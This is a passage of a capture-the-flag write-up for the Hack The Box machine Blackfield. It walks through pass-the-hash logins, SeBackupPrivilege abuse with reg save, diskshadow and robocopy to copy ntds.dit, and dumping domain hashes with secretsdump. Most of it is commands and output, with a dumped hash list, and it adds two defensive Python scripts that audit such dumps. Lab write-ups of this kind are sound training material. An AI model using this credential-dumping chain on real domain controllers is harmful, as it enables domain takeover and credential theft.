\commands_output
. D 0 Mon Feb 24 02:14:37 2020
.. D 0 Mon Feb 24 02:14:37 2020
domain_admins.txt A 528 Sun Feb 23 21:00:19 2020
domain_groups.txt A 962 Sun Feb 23 20:51:52 2020
domain_users.txt A 16454 Sat Feb 29 06:32:17 2020
firewall_rules.txt A 518202 Sun Feb 23 20:53:58 2020
ipconfig.txt A 1782 Sun Feb 23 20:50:28 2020
netstat.txt A 3842 Sun Feb 23 20:51:01 2020
route.txt A 3976 Sun Feb 23 20:53:01 2020
systeminfo.txt A 4550 Sun Feb 23 20:56:59 2020
tasklist.txt A 9990 Sun Feb 23 20:54:29 2020

\memory_analysis
. D 0 Fri May 29 04:28:33 2020
.. D 0 Fri May 29 04:28:33 2020
conhost.zip A 37876530 Fri May 29 04:25:36 2020
ctfmon.zip A 24962333 Fri May 29 04:25:45 2020
dfsrs.zip A 23993305 Fri May 29 04:25:54 2020
dllhost.zip A 18366396 Fri May 29 04:26:04 2020
ismserv.zip A 8810157 Fri May 29 04:26:13 2020
lsass.zip A 41936098 Fri May 29 04:25:08 2020
mmc.zip A 64288607 Fri May 29 04:25:25 2020
RuntimeBroker.zip A 13332174 Fri May 29 04:26:24 2020
ServerManager.zip A 131983313 Fri May 29 04:26:49 2020
sihost.zip A 33141744 Fri May 29 04:27:00 2020
smartscreen.zip A 33756344 Fri May 29 04:27:11 2020
svchost.zip A 14408833 Fri May 29 04:27:19 2020
taskhostw.zip A 34631412 Fri May 29 04:27:30 2020
winlogon.zip A 14255089 Fri May 29 04:27:38 2020
wlms.zip A 4067425 Fri May 29 04:27:44 2020
WmiPrvSE.zip A 18303252 Fri May 29 04:27:53 2020

\tools

17. There is a lot of material in this share; I'll only list what I want

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -U audit2020%'Admin@123' //10.10.10.192/forensic
Try "help" to get a list of possible commands.
smb: \> cd memory_analysis\
smb: \memory_analysis\> get lsass.zip
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: \memory_analysis\> get lsass.zip
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: \memory_analysis\> get lsass.zip
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: \memory_analysis\> get lsass.zip
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: \memory_analysis\> getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip SMBecho failed (NT_STATUS_CONNECTION_DISCONNECTED). The connection is disconnected now

18. The lsass.zip file is too large and the download keeps failing, so I'll skip it and just list the commands that would be used

unzip lsass.zip 

file lsass.DMP

ls -lh lsass.DMP


pypykatz lsa minidump lsass.DMP

== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
== SSP [633ba]==
username
domainname
password None
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
Password: None
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None

19. That gives us the account's password hash from memory; let's try it

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)

20. Nice, these credentials can log in to WinRM; let's log in

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup
*Evil-WinRM* PS C:\Users\svc_backup\Documents>

21. Get the first flag

*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> ls


Directory: C:\Users\svc_backup\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2020 2:26 PM 32 user.txt


*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cat user.txt
3920bb317a0bef51027e2852be64b543
*Evil-WinRM* PS C:\Users\svc_backup\Desktop>

0x02 Getting system access

22. Check the current user's privileges

*Evil-WinRM* PS C:\Users\svc_backup\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_backup\Desktop>

23. SeBackupPrivilege essentially allows reading the entire system. This is because svc_backup is in the Backup Operators group:

*Evil-WinRM* PS C:\Users\svc_backup\Desktop> net user svc_backup
User name svc_backup
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 2/23/2020 10:54:48 AM
Password expires Never
Password changeable 2/24/2020 10:54:48 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/23/2020 11:03:50 AM

Logon hours allowed All

Local Group Memberships *Backup Operators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc_backup\Desktop>

24. Backup Operators is a default Windows group intended to back up and restore files on a computer through certain methods, which read and write all (or most) files on the system. I found a post on how to dump the local SAM hashes by abusing the SeBackupPrivilege, which can be found here; I'll try the same technique to see whether I can dump the hashes:

First, I copied the simple method from the post for saving the SAM and SYSTEM hives with the following two commands:

reg save hklm\sam c:\temp\sam

reg save hklm\system c:\temp\system

To run the above commands correctly, I first created a temp directory on the C: drive, then ran the commands:

24. Following those steps:

*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cd C:/
*Evil-WinRM* PS C:\> mkdir temp


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/15/2024 3:41 PM temp


*Evil-WinRM* PS C:\> reg save hklm\sam c:\temp\sam
The operation completed successfully.

*Evil-WinRM* PS C:\> reg save hklm\system c:\temp\system
The operation completed successfully.

*Evil-WinRM* PS C:\> cd temp
*Evil-WinRM* PS C:\temp> ls


Directory: C:\temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/15/2024 3:41 PM 45056 sam
-a---- 5/15/2024 3:41 PM 17580032 system


*Evil-WinRM* PS C:\temp> download sam

Info: Downloading C:\temp\sam to sam

Info: Download successful!
*Evil-WinRM* PS C:\temp> download system

Info: Downloading C:\temp\system to system

Info: Download successful!
*Evil-WinRM* PS C:\temp>

25. Dump the hashes with impacket-secretsdump

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
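The `user:rid:lmhash:nthash:::` rows secretsdump prints are the same format whether they come from a local SAM, as here, or from ntds.dit later on, and a defender auditing a dump of their own wants three things out of it. As an added example (my own code, not from this writeup or from impacket), the Python below parses those rows and reports accounts with an empty-password NT hash, accounts that still have a real LM hash stored, and NT hashes shared by more than one account (password reuse). The sample dump reuses the three rows from the page and adds two constructed accounts, svc_legacy and jdoe, that share one NT hash; they are not from the box.

```python
import re
from collections import defaultdict

# LM hash of an empty string (what is shown when LM storage is disabled) and the
# NT hash of an empty password; both are well-known constants.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# secretsdump prints one "user:rid:lmhash:nthash:::" row per account.
ROW = re.compile(
    r"^(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)

# Constructed sample: the page's three rows plus two invented accounts.
SAMPLE_DUMP = """\
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_legacy:1105:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
jdoe:1106:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
[*] Cleaning up...
"""


def parse_secretsdump(text):
    """Return one dict per hash row; status lines ([*], [-]) are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            d = m.groupdict()
            d["rid"] = int(d["rid"])
            d["lm"], d["nt"] = d["lm"].lower(), d["nt"].lower()
            rows.append(d)
    return rows


def audit_hashes(rows):
    """Three findings a defender pulls from such a dump:
    blank_password: NT hash of "" (check the enabled flag separately; the dump
                    does not carry it, and Guest/DefaultAccount are normally disabled);
    lm_present:     a real LM hash is stored, i.e. LM hashing was not disabled;
    reused:         the same NT hash on more than one account."""
    by_nt = defaultdict(list)
    blank, lm_present = [], []
    for r in rows:
        if r["nt"] == EMPTY_NT:
            blank.append(r["user"])
        else:
            by_nt[r["nt"]].append(r["user"])
        if r["lm"] != EMPTY_LM:
            lm_present.append(r["user"])
    reused = {nt: users for nt, users in by_nt.items() if len(users) > 1}
    return {"blank_password": blank, "lm_present": lm_present, "reused": reused}
```

The reuse check is the one that matters most after a domain dump: a local Administrator hash that also appears on domain accounts, or one service-account hash shared across several services, turns a single cracked password into lateral movement, and the hash comparison finds that without cracking anything.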

26. It can't be used; the password is wrong

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.192 -u administrator -H 67ef902eae0d740df6257f273de75051
SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [-] BLACKFIELD.local\administrator:67ef902eae0d740df6257f273de75051

27. Since the SAM hashes don't work, I'll switch focus to the ntds.dit file, which is the domain controller's equivalent of the local SAM file. A good way to read ntds.dit is another Microsoft utility, diskshadow; because my shell is not an interactive desktop, I want to use its scripting mode, which simply takes diskshadow commands from a file, one per line. The Pentestlab blog has a good breakdown that includes using diskshadow. It is written as if you have administrator rights and only need to deal with accessing the file, so my approach differs slightly: I'll create a shadow copy with VSS and read the files that are locked on C: from there. I used the following commands directly on the victim machine to create the diskshadow.txt file:

*Evil-WinRM* PS C:\temp> echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
*Evil-WinRM* PS C:\temp> echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\temp> echo "create" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\temp> echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\temp> cat diskshadow.txt
set context persistent nowriters
add volume c: alias temp
create
expose %temp% z:
*Evil-WinRM* PS C:\temp>

28. After creating diskshadow.txt, I use the following command to create the shadow copy and expose it as the Z:\ drive:

diskshadow.exe /s c:\temp\diskshadow.txt

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow


*Evil-WinRM* PS C:\temp> diskshadow.exe /s c:\temp\diskshadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 5/15/2024 3:55:33 PM

-> set context persistent nowriters
-> add volume c: alias temp
-> create
Alias temp for shadow ID {240888e7-daaa-4d05-8afd-997cd31e52fc} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {5afccffd-0ca4-4497-ab22-da339b40a5eb} set as environment variable.

Querying all shadow copies with the shadow copy set ID {5afccffd-0ca4-4497-ab22-da339b40a5eb}

* Shadow copy ID = {240888e7-daaa-4d05-8afd-997cd31e52fc} %temp%
- Shadow copy set: {5afccffd-0ca4-4497-ab22-da339b40a5eb} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 5/15/2024 3:55:34 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %temp% z:
-> %temp% = {240888e7-daaa-4d05-8afd-997cd31e52fc}
The shadow copy was successfully exposed as z:\.
->
*Evil-WinRM* PS C:\temp>

29. I'll now move into the ntds folder to check whether the above command worked:

*Evil-WinRM* PS C:\temp> cd z:
*Evil-WinRM* PS z:\> cd windows
*Evil-WinRM* PS z:\windows> cd ntds
*Evil-WinRM* PS z:\windows\ntds> ls


Directory: z:\windows\ntds


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/10/2023 6:05 PM 8192 edb.chk
-a---- 5/15/2024 3:51 PM 10485760 edb.log
-a---- 2/23/2020 9:41 AM 10485760 edb00004.log
-a---- 2/23/2020 9:41 AM 10485760 edb00005.log
-a---- 2/23/2020 3:13 AM 10485760 edbres00001.jrs
-a---- 2/23/2020 3:13 AM 10485760 edbres00002.jrs
-a---- 2/23/2020 9:41 AM 10485760 edbtmp.log
-a---- 5/15/2024 2:00 PM 18874368 ntds.dit
-a---- 5/15/2024 2:00 PM 16384 ntds.jfm
-a---- 5/15/2024 2:00 PM 434176 temp.edb


*Evil-WinRM* PS z:\windows\ntds>

30. I was able to move into the ntds folder but could not view ntds.dit. So I can now use Microsoft's robocopy command to move the backed-up ntds.dit file to my temp folder:

*Evil-WinRM* PS z:\windows\ntds> robocopy /b .\ C:\temp NTDS.dit

-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------

Started : Wednesday, May 15, 2024 3:57:09 PM
Source : z:\windows\ntds\
Dest : C:\temp\

Files : NTDS.dit

Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

1 z:\windows\ntds\
New File 18.0 m ntds.dit

------------------------------------------------------------------------------

Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 0
Files : 1 1 0 0 0 0
Bytes : 18.00 m 18.00 m 0 0 0 0
Times : 0:00:00 0:00:00 0:00:00 0:00:00


Speed : 299593142 Bytes/sec.
Speed : 17142.857 MegaBytes/min.
Ended : Wednesday, May 15, 2024 3:57:09 PM

*Evil-WinRM* PS z:\windows\ntds>

31. It reports that the copy completed, and by checking the temp folder I was able to confirm that the file was copied.

*Evil-WinRM* PS z:\windows\ntds> ls C:\temp


Directory: C:\temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/15/2024 3:55 PM 608 2024-05-15_15-55-34_DC01.cab
-a---- 5/15/2024 3:53 PM 86 diskshadow.txt
-a---- 5/15/2024 2:00 PM 18874368 ntds.dit
-a---- 5/15/2024 3:41 PM 45056 sam
-a---- 5/15/2024 3:41 PM 17580032 system


*Evil-WinRM* PS z:\windows\ntds> cd C:\temp
*Evil-WinRM* PS C:\temp>

32. After obtaining the ntds.dit file, we also need to get the SYSTEM hive from the registry, then send both files to our attacker machine to dump them locally.

*Evil-WinRM* PS z:\windows\ntds> cd C:\temp
*Evil-WinRM* PS C:\temp> reg.exe save hklm\system C:\temp\system.bak
The operation completed successfully.

*Evil-WinRM* PS C:\temp> download ntds.dit

Info: Downloading C:\temp\ntds.dit to ntds.dit

Info: Download successful!
*Evil-WinRM* PS C:\temp> download system.bak

Info: Downloading C:\temp\system.bak to system.bak

Info: Download successful!
*Evil-WinRM* PS C:\temp>

33. Then we start dumping the password hashes:

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-secretsdump -ntds ntds.dit -system system.bak LOCAL > ntds-hashes.txt

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat ntds-hashes.txt
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
....................
BLACKFIELD.local\BLACKFIELD553715:1111:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
SRV-WEB$:aes256-cts-hmac-sha1-96:090ad36e547c20ff359787a27d452243ab3e9ef4b54595add458fbd265e6c103
SRV-WEB$:aes128-cts-hmac-sha1-96:063e5e2795292318208f411f8ce0797e
SRV-WEB$:des-cbc-md5:b580c4c2bc0b19d6
SRV-FILE$:aes256-cts-hmac-sha1-96:eae9659f47e401ba621fe838cc590494d13eb75f3140c366301222356a200f65
SRV-FILE$:aes128-cts-hmac-sha1-96:44da7f10383facd38df5713bc4259e69
SRV-FILE$:des-cbc-md5:f47cc238c1ce9791
SRV-EXCHANGE$:aes256-cts-hmac-sha1-96:04268f211f13d2f617f68ce89e795e360a01efb0bd1645e10853f4fdc3096a65
SRV-EXCHANGE$:aes128-cts-hmac-sha1-96:eb62e53de31dc30bcefe16e89289efff
SRV-EXCHANGE$:des-cbc-md5:f162aeb3da497aab
SRV-INTRANET$:aes256-cts-hmac-sha1-96:bc6ddf66d2027c2b9f4b921726d53032cad3e14efd5291c114f1ae76547be9a6
SRV-INTRANET$:aes128-cts-hmac-sha1-96:54416d5a7209a9bb741740834dddc7ad
SRV-INTRANET$:des-cbc-md5:4579ce9240895dae
[*] Cleaning up...
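
Triaging the whole dump rather than grepping for one account, as an added example that is not part of the original writeup: the script below parses the `user:rid:lmhash:nthash:::` lines that impacket-secretsdump prints (the format announced on the `Dumping Domain Credentials` line) and flags empty passwords, legacy LM hashes, and NT hashes shared by several accounts, which is how a defender would audit the same output for password reuse. The `SAMPLE` lines and every hash in them are constructed and do not come from this box.

```python
"""Audit secretsdump-style NTDS output for weak-credential indicators.
Added example, not part of the original writeup. SAMPLE is constructed;
none of its hashes come from a real domain."""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
# Only hash lines match: Kerberos key lines have no numeric RID field.
DUMP_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_dump(text):
    """Return (user, rid, lmhash, nthash) tuples from secretsdump output."""
    rows = []
    for line in text.splitlines():
        m = DUMP_LINE.match(line.strip())
        if m:
            rows.append((m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return rows


def audit(rows):
    """Flag empty passwords, stored LM hashes, and NT hashes shared by accounts."""
    by_nt = defaultdict(list)
    findings = {"empty_password": [], "lm_hash_present": [], "shared_nt_hash": {}}
    for user, _rid, lm, nt in rows:
        if nt == EMPTY_NT:
            findings["empty_password"].append(user)
        if lm != EMPTY_LM:  # a real LM hash means LM storage is on and the password is short
            findings["lm_hash_present"].append(user)
        by_nt[nt].append(user)
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:  # identical NT hash == identical password
            findings["shared_nt_hash"][nt] = users
    return findings


SAMPLE = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CORP.local\\svc_one:1105:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
CORP.local\\svc_two:1106:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
legacy:1107:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:89abcdef0123456789abcdef01234567:::
SRV-WEB$:aes256-cts-hmac-sha1-96:00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff
"""

if __name__ == "__main__":
    print(audit(parse_dump(SAMPLE)))
```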

34. Filter for just the Administrator's hashes:

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat ntds-hashes.txt | grep Administrator
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Administrator:aes256-cts-hmac-sha1-96:dbd84e6cf174af55675b4927ef9127a12aade143018c78fbbe568d394188f21f
Administrator:aes128-cts-hmac-sha1-96:8148b9b39b270c22aaa74476c63ef223
Administrator:des-cbc-md5:5d25a84ac8c229c1

35. Verify whether the password hash is usable:

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee
SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [+] BLACKFIELD.local\administrator:184fb5e5178480be64824d4cd53b99ee (Pwn3d!)

36. Get the final flag:

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2020 4:36 PM 447 notes.txt
-a---- 11/5/2020 8:38 PM 32 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
4375a629c7c67c8e29db269060c955cb
*Evil-WinRM* PS C:\Users\Administrator\Desktop>

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/255


Blackfield-htb-writeup
https://sh1yan.top/2024/05/16/Blackfield-htb-writeup/
Author: shiyan
Published: 16 May 2024